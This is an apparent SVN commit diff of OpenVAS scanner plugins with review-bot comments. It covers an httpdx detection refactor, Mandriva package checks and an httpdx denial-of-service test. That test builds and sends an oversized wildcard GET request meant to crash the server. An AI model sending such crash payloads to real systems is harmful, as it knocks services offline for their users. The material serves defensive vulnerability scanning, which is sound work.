include("ftp_func.inc");
include("http_func.inc");
-include("cpe.inc");
include("host_details.inc");
-## Constant values
-SCRIPT_OID = "1.3.6.1.4.1.25623.1.0.800960";
-SCRIPT_DESC = "httpdx Server Version Detection";
+## Variable Initialization
+ftpPort = 0;
+httpPort = 0;
+banner = "";
+httpdxVer = NULL;
+vers = string("unknown");
httpPort = get_kb_item("Services/www");
if(!httpPort){
@@ -76,20 +82,26 @@
banner = get_kb_item(string("Banner/", port));
}
- if(!isnull(banner) && "httpdx" >< banner)
+ if(banner && "httpdx" >< banner)
{
httpdxVer = eregmatch(pattern:"httpdx.([0-9.]+[a-z]?)", string:banner);
if(!isnull(httpdxVer[1]))
{
set_kb_item(name:"httpdx/" + port + "/Ver", value:httpdxVer[1]);
- security_note(data:"httpdx version " + httpdxVer[1] + " was detected on the host");
-
- ## build cpe and store it as host_detail
- cpe = build_cpe(value:httpdxVer[1], exp:"^([0-9.]+([a-z]+)?)", base:"cpe:/a:jasper:httpdx:");
- if(!isnull(cpe))
- register_host_detail(name:"App", value:cpe, nvt:SCRIPT_OID, desc:SCRIPT_DESC);
+ vers = httpdxVer[1];
+ }
- }
+ set_kb_item(name:"httpdx/installed", value:TRUE);
+
+ ## build cpe and store it as host_detail
+ cpe = build_cpe(value:vers, exp:"^([0-9.]+([a-z]+)?)", base:"cpe:/a:jasper:httpdx:");
+ if(isnull(cpe))
+ cpe = 'cpe:/a:jasper:httpdx';
+
+ register_product(cpe:cpe, location:"/", nvt:SCRIPT_OID, port:port);
+
+ log_message(data: build_detection_report(app:"httpdx", version:vers,
+ install:"/", cpe:cpe, concluded: vers), port:port);
}
}
}
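Review bot: `vers` is set to "unknown" once in the initialization block of the previous hunk and overwritten only when `httpdxVer[1]` matches. If the enclosing block runs for more than one port, a version found on an earlier port is registered for a later port whose banner yielded none; the block starts outside this hunk, but the `port` variable and the nesting suggest a loop. Reset it at the top of the banner branch with `vers = "unknown";` before the `eregmatch()` call. `concluded: vers` also repeats the parsed version rather than the evidence; passing the matched banner text (`httpdxVer[0]` when the match succeeded) would make the detection report auditable.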
Added: trunk/openvas-plugins/scripts/gb_httpdx_wildcards_remote_dos_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_httpdx_wildcards_remote_dos_vuln.nasl (rev 0)
+++ trunk/openvas-plugins/scripts/gb_httpdx_wildcards_remote_dos_vuln.nasl 2012-07-31 13:07:25 UTC (rev 13810)
@@ -0,0 +1,105 @@
+##############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# httpdx Wildcards Remote Denial of Service Vulnerability
+#
+# Authors:
+# Sooraj KS <kssooraj at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+SCRIPT_OID = "1.3.6.1.4.1.25623.1.0.802662";
+CPE = "cpe:/a:jasper:httpdx";
+
+if(description)
+{
+ script_oid(SCRIPT_OID);
+ script_version("$Revision$");
+ script_bugtraq_id(54629);
+ script_tag(name:"cvss_base", value:"5.0");
+ script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:N/I:N/A:P");
+ script_tag(name:"risk_factor", value:"Medium");
+ script_tag(name:"last_modification", value:"$Date$");
+ script_tag(name:"creation_date", value:"2012-07-27 12:12:12 +0530 (Fri, 27 Jul 2012)");
+ script_name("httpdx Wildcards Remote Denial of Service Vulnerability");
+ desc = "
+ Overview: This host is running httpdx and is prone to denial of service
+ vulnerability.
+
+ Vulnerability Insight:
+ The flaw is caused due to a boundary error when processing certain http
+ requests and can be exploited to cause a denial of service via a specially
+ crafted packet.
+
+ Impact:
+ Successful exploitation will allow attackers to cause the server to crash,
+ denying service to legitimate users.
+
+ Impact Level: Application
+
+ Affected Software/OS:
+ httpdx version 1.5.4
+
+ Fix: No solution or patch is available as on 27th July, 2012. Information
+ regarding this issue will be updated once the solution details are available.
+ For updates refer, http://sourceforge.net/projects/httpdx/
+
+ References:
+ http://www.securityfocus.com/bid/54629
+ http://www.exploit-db.com/exploits/19988 ";
+
+ script_description(desc);
+ script_summary("Determine if httpdx is prone to a denial of service");
+ script_category(ACT_DENIAL);
+ script_copyright("Copyright (c) 2012 Greenbone Networks GmbH");
+ script_family("Denial of Service");
+ script_dependencies("gb_httpdx_server_detect.nasl");
+ script_require_keys("httpdx/installed");
+ script_require_ports("Services/www",80);
+ exit(0);
+}
+
+
+include("http_func.inc");
+include("host_details.inc");
+
+## Variable Initialization
+port = 0;
+req = "";
+res = "";
+crash = "";
+
+## Get HTTP Port
+port = get_app_port(cpe:CPE, nvt:SCRIPT_OID);
+if(! port){
+ exit(0);
+}
+
+## Construct attack Request
+crash = crap(data: "*", length: 2450) + crap(data: "A", length: 540);
+req = string("GET /", crash, " HTTP/1.0\r\n",
+ "Host: ", get_host_name(), "\r\n\r\n");
+
+## Send attack request
+res = http_send_recv(port:port, data:req);
+
+## Confirm httpdx is dead
+if(http_is_dead(port:port)){
+ security_warning(port);
+}
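Review bot: The port returned by `get_app_port(cpe:CPE, nvt:SCRIPT_OID)` may not be an HTTP listener, yet the script sends it an HTTP request without checking. gb_httpdx_server_detect.nasl in this commit also requires `Services/ftp` and 21 and calls `register_product(..., port:port)` for the port it matched; whether `get_app_port()` can return the FTP port depends on code outside this hunk, but nothing here rules it out. Confirm the service before sending, for example `banner = get_http_banner(port:port);` followed by `if(!banner || "httpdx" >!< banner) exit(0);`. The same applies to gb_httpdx_post_req_bof_vuln.nasl.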
Property changes on: trunk/openvas-plugins/scripts/gb_httpdx_wildcards_remote_dos_vuln.nasl
___________________________________________________________________
Added: svn:keywords
+ Revision Date Id
Added: trunk/openvas-plugins/scripts/gb_mandriva_MDVSA_2012_112.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_mandriva_MDVSA_2012_112.nasl (rev 0)
+++ trunk/openvas-plugins/scripts/gb_mandriva_MDVSA_2012_112.nasl 2012-07-31 13:07:25 UTC (rev 13810)
@@ -0,0 +1,109 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+#
+# Mandriva Update for perl-DBD-Pg MDVSA-2012:112 (perl-DBD-Pg)
+#
+# Authors:
+# System Generated Check
+#
+# Copyright:
+# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+ desc = "
+
+ Vulnerability Insight:
+
+ A vulnerability has been discovered and corrected in perl-DBD-Pg:
+
+ Two format string flaws were found in the way perl-DBD-Pg. A
+ rogue server could provide a specially-crafted database warning
+ or specially-crafted DBD statement, which once processed by the
+ perl-DBD-Pg interface would lead to perl-DBD-Pg based process crash
+ (CVE-2012-1151).
+
+ The updated packages have been patched to correct this issue.
+
+ Affected Software/OS:
+ perl-DBD-Pg on Mandriva Linux 2011.0,
+ Mandriva Enterprise Server 5.2
+
+ Fix: Please Install the Updated Packages.
+
+ References:
+ http://www.mandriva.com/en/support/security/advisories/?name=MDVSA-2012:112 ";
+
+if(description)
+{
+ script_id(831706);
+ script_version("$Revision$");
+ script_tag(name:"last_modification", value:"$Date$");
+ script_tag(name:"check_type", value:"authenticated package test");
+ script_tag(name:"creation_date", value:"2012-07-30 11:23:00 +0530 (Mon, 30 Jul 2012)");
+ script_cve_id("CVE-2012-1151");
+ script_tag(name:"cvss_base", value:"10.0");
+ script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:C/I:C/A:C");
+ script_tag(name:"risk_factor", value:"Critical");
+ script_xref(name: "MDVSA", value: "2012:112");
+ script_name("Mandriva Update for perl-DBD-Pg MDVSA-2012:112 (perl-DBD-Pg)");
+
+ script_description(desc);
+ script_summary("Check for the Version of perl-DBD-Pg");
+ script_category(ACT_GATHER_INFO);
+ script_copyright("Copyright (c) 2012 Greenbone Networks GmbH");
+ script_family("Mandrake Local Security Checks");
+ script_dependencies("gather-package-list.nasl");
+ script_mandatory_keys("login/SSH/success", "ssh/login/release");
+ exit(0);
+}
+
+
+include("pkg-lib-rpm.inc");
+include("revisions-lib.inc");
+
+release = get_kb_item("ssh/login/release");
+
+res = "";
+if(release == NULL){
+ exit(0);
+}
+
+if(release == "MNDK_2011.0")
+{
+
+ if ((res = isrpmvuln(pkg:"perl-DBD-Pg", rpm:"perl-DBD-Pg~2.18.1~1.1~mdv2011.0", rls:"MNDK_2011.0")) != NULL)
+ {
+ security_hole(data:res + '\n' + desc);
+ exit(0);
+ }
+
+ if (__pkg_match) exit(99); # Not vulnerable.
+ exit(0);
+}
+
+
+if(release == "MNDK_mes5.2")
+{
+
+ if ((res = isrpmvuln(pkg:"perl-DBD-Pg", rpm:"perl-DBD-Pg~2.10.3~1.1mdvmes5.2", rls:"MNDK_mes5.2")) != NULL)
+ {
+ security_hole(data:res + '\n' + desc);
+ exit(0);
+ }
+
+ if (__pkg_match) exit(99); # Not vulnerable.
+ exit(0);
+}
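Review bot: The tags `cvss_base` `10.0`, vector `AV:N/AC:L/Au:N/C:C/I:C/A:C` and `risk_factor` `Critical` do not match the impact stated in `desc`, which only mentions a crash of the perl-DBD-Pg based process. Over-scored results distort triage in scan reports, so these values should be checked against the CVE-2012-1151 entry. If the impact really is limited to a crash, a partial-availability vector such as `AV:N/AC:L/Au:N/C:N/I:N/A:P` would fit better. The sentence `Two format string flaws were found in the way perl-DBD-Pg.` in `desc` is also cut short and reads as incomplete in the report output.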
Property changes on: trunk/openvas-plugins/scripts/gb_mandriva_MDVSA_2012_112.nasl
___________________________________________________________________
Added: svn:keywords
+ Revision Date Id
Added: trunk/openvas-plugins/scripts/gb_mandriva_MDVSA_2012_113.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_mandriva_MDVSA_2012_113.nasl (rev 0)
+++ trunk/openvas-plugins/scripts/gb_mandriva_MDVSA_2012_113.nasl 2012-07-31 13:07:25 UTC (rev 13810)
@@ -0,0 +1,93 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+#
+# Mandriva Update for arpwatch MDVSA-2012:113 (arpwatch)
+#
+# Authors:
+# System Generated Check
+#
+# Copyright:
+# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+ desc = "
+
+ Vulnerability Insight:
+
+ A vulnerability has been discovered and corrected in arpwatch:
+
+ arpwatch 2.1a15, as used by Red Hat, Debian, Fedora, and possibly
+ others, does not properly drop supplementary groups, which might allow
+ attackers to gain root privileges by leveraging other vulnerabilities
+ in the daemon (CVE-2012-2653).
+
+ The updated packages have been patched to correct this issue.
+
+ Affected Software/OS:
+ arpwatch on Mandriva Linux 2011.0
+
+ Fix: Please Install the Updated Packages.
+
+ References:
+ http://www.mandriva.com/en/support/security/advisories/?name=MDVSA-2012:113 ";
+
+if(description)
+{
+ script_id(831705);
+ script_version("$Revision$");
+ script_tag(name:"last_modification", value:"$Date$");
+ script_tag(name:"check_type", value:"authenticated package test");
+ script_tag(name:"creation_date", value:"2012-07-30 11:22:58 +0530 (Mon, 30 Jul 2012)");
+ script_cve_id("CVE-2012-2653");
+ script_tag(name:"cvss_base", value:"10.0");
+ script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:C/I:C/A:C");
+ script_tag(name:"risk_factor", value:"Critical");
+ script_xref(name: "MDVSA", value: "2012:113");
+ script_name("Mandriva Update for arpwatch MDVSA-2012:113 (arpwatch)");
+
+ script_description(desc);
+ script_summary("Check for the Version of arpwatch");
+ script_category(ACT_GATHER_INFO);
+ script_copyright("Copyright (c) 2012 Greenbone Networks GmbH");
+ script_family("Mandrake Local Security Checks");
+ script_dependencies("gather-package-list.nasl");
+ script_mandatory_keys("HostDetails/OS/cpe:/o:mandriva:linux", "login/SSH/success", "ssh/login/release");
+ exit(0);
+}
+
+
+include("pkg-lib-rpm.inc");
+include("revisions-lib.inc");
+
+release = get_kb_item("ssh/login/release");
+
+res = "";
+if(release == NULL){
+ exit(0);
+}
+
+if(release == "MNDK_2011.0")
+{
+
+ if ((res = isrpmvuln(pkg:"arpwatch", rpm:"arpwatch~2.1a15~9.1~mdv2011.0", rls:"MNDK_2011.0")) != NULL)
+ {
+ security_hole(data:res + '\n' + desc);
+ exit(0);
+ }
+
+ if (__pkg_match) exit(99); # Not vulnerable.
+ exit(0);
+}
Property changes on: trunk/openvas-plugins/scripts/gb_mandriva_MDVSA_2012_113.nasl
___________________________________________________________________
Added: svn:keywords
+ Revision Date Id
Added: trunk/openvas-plugins/scripts/gb_mandriva_MDVSA_2012_115.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_mandriva_MDVSA_2012_115.nasl (rev 0)
+++ trunk/openvas-plugins/scripts/gb_mandriva_MDVSA_2012_115.nasl 2012-07-31 13:07:25 UTC (rev 13810)
@@ -0,0 +1,132 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+#
+# Mandriva Update for dhcp MDVSA-2012:115 (dhcp)
+#
+# Authors:
+# System Generated Check
+#
+# Copyright:
+# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+ desc = "
+
+ Vulnerability Insight:
+
+ Multiple vulnerabilities has been discovered and corrected in ISC DHCP:
+
+ An unexpected client identifier parameter can cause the ISC DHCP
+ daemon to segmentation fault when running in DHCPv6 mode, resulting
+ in a denial of service to further client requests. In order to exploit
+ this condition, an attacker must be able to send requests to the DHCP
+ server (CVE-2012-3570)
+
+ Two memory leaks have been found and fixed in ISC DHCP. Both are
+ reproducible when running in DHCPv6 mode (with the -6 command-line
+ argument.) The first leak is confirmed to only affect servers
+ operating in DHCPv6 mode, but based on initial code analysis the
+ second may theoretically affect DHCPv4 servers (though this has not
+ been demonstrated.) (CVE-2012-3954).
+
+ The updated packages have been upgraded to the latest version
+ (4.2.4-P1) which is not affected by these issues.
+
+ Affected Software/OS:
+ dhcp on Mandriva Linux 2011.0
+
+ Fix: Please Install the Updated Packages.
+
+ References:
+ http://www.mandriva.com/en/support/security/advisories/?name=MDVSA-2012:115 ";
+
+if(description)
+{
+ script_id(831703);
+ script_version("$Revision$");
+ script_tag(name:"last_modification", value:"$Date$");
+ script_tag(name:"check_type", value:"authenticated package test");
+ script_tag(name:"creation_date", value:"2012-07-30 11:22:50 +0530 (Mon, 30 Jul 2012)");
+ script_cve_id("CVE-2012-3570", "CVE-2012-3571", "CVE-2012-3954");
+ script_tag(name:"cvss_base", value:"6.1");
+ script_tag(name:"cvss_base_vector", value:"AV:A/AC:L/Au:N/C:N/I:N/A:C");
+ script_tag(name:"risk_factor", value:"High");
+ script_xref(name: "MDVSA", value: "2012:115");
+ script_name("Mandriva Update for dhcp MDVSA-2012:115 (dhcp)");
+
+ script_description(desc);
+ script_summary("Check for the Version of dhcp");
+ script_category(ACT_GATHER_INFO);
+ script_copyright("Copyright (c) 2012 Greenbone Networks GmbH");
+ script_family("Mandrake Local Security Checks");
+ script_dependencies("gather-package-list.nasl");
+ script_mandatory_keys("HostDetails/OS/cpe:/o:mandriva:linux", "login/SSH/success", "ssh/login/release");
+ exit(0);
+}
+
+
+include("pkg-lib-rpm.inc");
+include("revisions-lib.inc");
+
+release = get_kb_item("ssh/login/release");
+
+res = "";
+if(release == NULL){
+ exit(0);
+}
+
+if(release == "MNDK_2011.0")
+{
+
+ if ((res = isrpmvuln(pkg:"dhcp-client", rpm:"dhcp-client~4.2.4~0.P1.1.1~mdv2011.0", rls:"MNDK_2011.0")) != NULL)
+ {
+ security_hole(data:res + '\n' + desc);
+ exit(0);
+ }
+
+ if ((res = isrpmvuln(pkg:"dhcp-common", rpm:"dhcp-common~4.2.4~0.P1.1.1~mdv2011.0", rls:"MNDK_2011.0")) != NULL)
+ {
+ security_hole(data:res + '\n' + desc);
+ exit(0);
+ }
+
+ if ((res = isrpmvuln(pkg:"dhcp-devel", rpm:"dhcp-devel~4.2.4~0.P1.1.1~mdv2011.0", rls:"MNDK_2011.0")) != NULL)
+ {
+ security_hole(data:res + '\n' + desc);
+ exit(0);
+ }
+
+ if ((res = isrpmvuln(pkg:"dhcp-doc", rpm:"dhcp-doc~4.2.4~0.P1.1.1~mdv2011.0", rls:"MNDK_2011.0")) != NULL)
+ {
+ security_hole(data:res + '\n' + desc);
+ exit(0);
+ }
+
+ if ((res = isrpmvuln(pkg:"dhcp-relay", rpm:"dhcp-relay~4.2.4~0.P1.1.1~mdv2011.0", rls:"MNDK_2011.0")) != NULL)
+ {
+ security_hole(data:res + '\n' + desc);
+ exit(0);
+ }
+
+ if ((res = isrpmvuln(pkg:"dhcp-server", rpm:"dhcp-server~4.2.4~0.P1.1.1~mdv2011.0", rls:"MNDK_2011.0")) != NULL)
+ {
+ security_hole(data:res + '\n' + desc);
+ exit(0);
+ }
+
+ if (__pkg_match) exit(99); # Not vulnerable.
+ exit(0);
+}
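Review bot: `script_cve_id` lists `CVE-2012-3571`, but `desc` only describes CVE-2012-3570 and CVE-2012-3954, so a reader of the scan report cannot tell what the third identifier covers. Either add the matching paragraph from the MDVSA-2012:115 advisory to `desc`, or drop the id if it does not apply to these packages. In the same string, `Multiple vulnerabilities has been discovered` should read `have been discovered`.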
Property changes on: trunk/openvas-plugins/scripts/gb_mandriva_MDVSA_2012_115.nasl
___________________________________________________________________
Added: svn:keywords
+ Revision Date Id
Added: trunk/openvas-plugins/scripts/gb_mandriva_MDVSA_2012_117.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_mandriva_MDVSA_2012_117.nasl (rev 0)
+++ trunk/openvas-plugins/scripts/gb_mandriva_MDVSA_2012_117.nasl 2012-07-31 13:07:25 UTC (rev 13810)
@@ -0,0 +1,108 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+#
+# Mandriva Update for python-pycrypto MDVSA-2012:117 (python-pycrypto)
+#
+# Authors:
+# System Generated Check
+#
+# Copyright:
+# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+ desc = "
+
+ Vulnerability Insight:
+
+ A vulnerability has been discovered and corrected in python-pycrypto:
+
+ PyCrypto before 2.6 does not produce appropriate prime numbers when
+ using an ElGamal scheme to generate a key, which reduces the signature
+ space or public key space and makes it easier for attackers to conduct
+ brute force attacks to obtain the private key (CVE-2012-2417).
+
+ The updated packages have been patched to correct this issue.
+
+ Affected Software/OS:
+ python-pycrypto on Mandriva Linux 2011.0,
+ Mandriva Enterprise Server 5.2
+
+ Fix: Please Install the Updated Packages.
+
+ References:
+ http://www.mandriva.com/en/support/security/advisories/?name=MDVSA-2012:117 ";
+
+if(description)
+{
+ script_id(831704);
+ script_version("$Revision$");
+ script_tag(name:"last_modification", value:"$Date$");
+ script_tag(name:"check_type", value:"authenticated package test");
+ script_tag(name:"creation_date", value:"2012-07-30 11:22:56 +0530 (Mon, 30 Jul 2012)");
+ script_cve_id("CVE-2012-2417");
+ script_tag(name:"cvss_base", value:"4.3");
+ script_tag(name:"cvss_base_vector", value:"AV:N/AC:M/Au:N/C:N/I:P/A:N");
+ script_tag(name:"risk_factor", value:"Medium");
+ script_xref(name: "MDVSA", value: "2012:117");
+ script_name("Mandriva Update for python-pycrypto MDVSA-2012:117 (python-pycrypto)");
+
+ script_description(desc);
+ script_summary("Check for the Version of python-pycrypto");
+ script_category(ACT_GATHER_INFO);
+ script_copyright("Copyright (c) 2012 Greenbone Networks GmbH");
+ script_family("Mandrake Local Security Checks");
+ script_dependencies("gather-package-list.nasl");
+ script_mandatory_keys("login/SSH/success", "ssh/login/release");
+ exit(0);
+}
+
+
+include("pkg-lib-rpm.inc");
+include("revisions-lib.inc");
+
+release = get_kb_item("ssh/login/release");
+
+res = "";
+if(release == NULL){
+ exit(0);
+}
+
+if(release == "MNDK_2011.0")
+{
+
+ if ((res = isrpmvuln(pkg:"python-pycrypto", rpm:"python-pycrypto~2.3~3.1~mdv2011.0", rls:"MNDK_2011.0")) != NULL)
+ {
+ security_hole(data:res + '\n' + desc);
+ exit(0);
+ }
+
+ if (__pkg_match) exit(99); # Not vulnerable.
+ exit(0);
+}
+
+
+if(release == "MNDK_mes5.2")
+{
+
+ if ((res = isrpmvuln(pkg:"pycrypto", rpm:"pycrypto~2.0.1~3.3mdvmes5.2", rls:"MNDK_mes5.2")) != NULL)
+ {
+ security_hole(data:res + '\n' + desc);
+ exit(0);
+ }
+
+ if (__pkg_match) exit(99); # Not vulnerable.
+ exit(0);
+}
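Review bot: The `cvss_base_vector` value `AV:N/AC:M/Au:N/C:N/I:P/A:N` scores an integrity impact, while `desc` describes attackers obtaining the private key, which reads as a confidentiality impact. This looks like a transposed component, so confirm it against the CVE-2012-2417 entry; if so, the tag would be `AV:N/AC:M/Au:N/C:P/I:N/A:N`. The MES 5.2 branch also tests the package name `pycrypto` while the 2011.0 branch and `script_summary` use `python-pycrypto`. A comment such as `# package is named pycrypto on MES 5.2` would show that the difference is intended.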
Property changes on: trunk/openvas-plugins/scripts/gb_mandriva_MDVSA_2012_117.nasl
___________________________________________________________________
Added: svn:keywords
+ Revision Date Id
Added: trunk/openvas-plugins/scripts/gb_mandriva_MDVSA_2012_119.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_mandriva_MDVSA_2012_119.nasl (rev 0)
+++ trunk/openvas-plugins/scripts/gb_mandriva_MDVSA_2012_119.nasl 2012-07-31 13:07:25 UTC (rev 13810)
@@ -0,0 +1,144 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+#
+# Mandriva Update for bind MDVSA-2012:119 (bind)
+#
+# Authors:
+# System Generated Check
+#
+# Copyright:
+# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+ desc = "
+
+ Vulnerability Insight:
+
+ A vulnerability was discovered and corrected in bind:
+
+ High numbers of queries with DNSSEC validation enabled can cause an
+ assertion failure in named, caused by using a bad cache data structure
+ before it has been initialized (CVE-2012-3817).
+
+ The updated packages have been upgraded to bind 9.7.6-P2 and 9.8.3-P2
+ which is not vulnerable to this issue.
+
+ Affected Software/OS:
+ bind on Mandriva Linux 2011.0,
+ Mandriva Enterprise Server 5.2
+
+ Fix: Please Install the Updated Packages.
+
+ References:
+ http://www.mandriva.com/en/support/security/advisories/?name=MDVSA-2012:119 ";
+
+if(description)
+{
+ script_id(831707);
+ script_version("$Revision$");
+ script_tag(name:"last_modification", value:"$Date$");
+ script_tag(name:"check_type", value:"authenticated package test");
+ script_tag(name:"creation_date", value:"2012-07-30 11:23:01 +0530 (Mon, 30 Jul 2012)");
+ script_cve_id("CVE-2012-3817");
+ script_tag(name:"cvss_base", value:"7.8");
+ script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:N/I:N/A:C");
+ script_tag(name:"risk_factor", value:"High");
+ script_xref(name: "MDVSA", value: "2012:119");
+ script_name("Mandriva Update for bind MDVSA-2012:119 (bind)");
+
+ script_description(desc);
+ script_summary("Check for the Version of bind");
+ script_category(ACT_GATHER_INFO);
+ script_copyright("Copyright (c) 2012 Greenbone Networks GmbH");
+ script_family("Mandrake Local Security Checks");
+ script_dependencies("gather-package-list.nasl");
+ script_mandatory_keys("login/SSH/success", "ssh/login/release");
+ exit(0);
+}
+
+
+include("pkg-lib-rpm.inc");
+include("revisions-lib.inc");
+
+release = get_kb_item("ssh/login/release");
+
+res = "";
+if(release == NULL){
+ exit(0);
+}
+
+if(release == "MNDK_2011.0")
+{
+
+ if ((res = isrpmvuln(pkg:"bind", rpm:"bind~9.8.3~0.0.P2.0.1~mdv2011.0", rls:"MNDK_2011.0")) != NULL)
+ {
+ security_hole(data:res + '\n' + desc);
+ exit(0);
+ }
+
+ if ((res = isrpmvuln(pkg:"bind-devel", rpm:"bind-devel~9.8.3~0.0.P2.0.1~mdv2011.0", rls:"MNDK_2011.0")) != NULL)
+ {
+ security_hole(data:res + '\n' + desc);
+ exit(0);
+ }
+
+ if ((res = isrpmvuln(pkg:"bind-doc", rpm:"bind-doc~9.8.3~0.0.P2.0.1~mdv2011.0", rls:"MNDK_2011.0")) != NULL)
+ {
+ security_hole(data:res + '\n' + desc);
+ exit(0);
+ }
+
+ if ((res = isrpmvuln(pkg:"bind-utils", rpm:"bind-utils~9.8.3~0.0.P2.0.1~mdv2011.0", rls:"MNDK_2011.0")) != NULL)
+ {
+ security_hole(data:res + '\n' + desc);
+ exit(0);
+ }
+
+ if (__pkg_match) exit(99); # Not vulnerable.
+ exit(0);
+}
+
+
+if(release == "MNDK_mes5.2")
+{
+
+ if ((res = isrpmvuln(pkg:"bind", rpm:"bind~9.7.6~0.0.P2.0.1mdvmes5.2", rls:"MNDK_mes5.2")) != NULL)
+ {
+ security_hole(data:res + '\n' + desc);
+ exit(0);
+ }
+
+ if ((res = isrpmvuln(pkg:"bind-devel", rpm:"bind-devel~9.7.6~0.0.P2.0.1mdvmes5.2", rls:"MNDK_mes5.2")) != NULL)
+ {
+ security_hole(data:res + '\n' + desc);
+ exit(0);
+ }
+
+ if ((res = isrpmvuln(pkg:"bind-doc", rpm:"bind-doc~9.7.6~0.0.P2.0.1mdvmes5.2", rls:"MNDK_mes5.2")) != NULL)
+ {
+ security_hole(data:res + '\n' + desc);
+ exit(0);
+ }
+
+ if ((res = isrpmvuln(pkg:"bind-utils", rpm:"bind-utils~9.7.6~0.0.P2.0.1mdvmes5.2", rls:"MNDK_mes5.2")) != NULL)
+ {
+ security_hole(data:res + '\n' + desc);
+ exit(0);
+ }
+
+ if (__pkg_match) exit(99); # Not vulnerable.
+ exit(0);
+}
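Review bot: The eight `isrpmvuln` blocks in the two release branches differ only in the package name, so the check would be easier to audit as a loop over the package list. With the fixed version written once per release, a wrong version string in one copy can no longer go unnoticed. The fence below shows the 2011.0 branch; the MES 5.2 branch would take the same shape with `~9.7.6~0.0.P2.0.1mdvmes5.2`. Since the header says the file is a system generated check, the change presumably belongs in the generator.

```nasl
if(release == "MNDK_2011.0")
{
  # One fixed version applies to every bind sub-package of this release.
  foreach pkg (make_list("bind", "bind-devel", "bind-doc", "bind-utils"))
  {
    if ((res = isrpmvuln(pkg:pkg, rpm:pkg + "~9.8.3~0.0.P2.0.1~mdv2011.0", rls:"MNDK_2011.0")) != NULL)
    {
      security_hole(data:res + '\n' + desc);
      exit(0);
    }
  }
  # … unchanged: __pkg_match check and exit(0) …
```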
Property changes on: trunk/openvas-plugins/scripts/gb_mandriva_MDVSA_2012_119.nasl
___________________________________________________________________
Added: svn:keywords
+ Revision Date Id
Added: trunk/openvas-plugins/scripts/gb_ms_win_media_service_handshake_seq_dos_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_ms_win_media_service_handshake_seq_dos_vuln.nasl (rev 0)
+++ trunk/openvas-plugins/scripts/gb_ms_win_media_service_handshake_seq_dos_vuln.nasl 2012-07-31 13:07:25 UTC (rev 13810)
@@ -0,0 +1,249 @@
+###############################################################################
